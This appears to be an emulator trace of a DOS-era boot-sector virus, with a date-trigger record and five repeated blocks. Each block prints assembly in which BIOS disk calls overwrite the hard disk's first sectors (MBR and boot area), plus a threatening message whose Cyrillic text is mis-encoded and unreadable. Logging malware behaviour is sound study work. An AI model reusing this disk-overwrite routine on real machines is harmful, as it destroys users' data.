Time Syscall Op Syscall Name
2018-12-25T12:21:13.840568139Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:21:13.85646714Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:21:13.862933445Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":1,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:14.066112072Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:21:14.083139888Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:21:14.088785387Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":1,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:14.275614475Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:21:14.292712271Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:21:14.298196678Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":1,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:14.472775417Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:21:14.489628558Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:21:14.495514761Z 10 PC: 1327f | Buffered keyboard input

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":16,"Min":1,"Second":0,"TimeBased":true,"OriginalID":8517,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:21:14.687636624Z 42 PC: 13238 | Get date 0x13238: cmp dh, dl
0x1323a: je 0x1323f
0x1323c: jmp 0x132cc
0x1323f: mov ah, 2
0x13241: mov dl, 0x80
0x13243: mov dh, 0
0x13245: mov cx, 1
0x13248: mov al, 9
0x1324a: mov bx, bp
0x1324c: add bx, 0x5d9
0x13250: int 0x13
0x13252: mov ah, 3
0x13254: mov dl, 0x80
0x13256: mov dh, 0
0x13258: mov cx, 1
0x1325b: mov al, 9
0x1325d: xor bx, bx
0x1325f: int 0x13
0x13261: mov ax, 2
0x13264: int 0x10
2018-12-25T12:21:14.704685562Z 9 PC: 13270 | Display string (String= '� ������� ����� ���� !!! ���쪮 �� � ��� ��� BOOT,MBR � FAT. �� ����ࠨ������ ,�� ���⢠ �㤥� �ਭ�ᥭ� ⮫쪮 �᫨ �� �� �⣠���� ������� (�⢥砩� ��⨭᪨�� �㪢���) : ����� � ����� ᠬ� ���訩 䠪���� :')
2018-12-25T12:21:14.71004658Z 10 PC: 1327f | Buffered keyboard input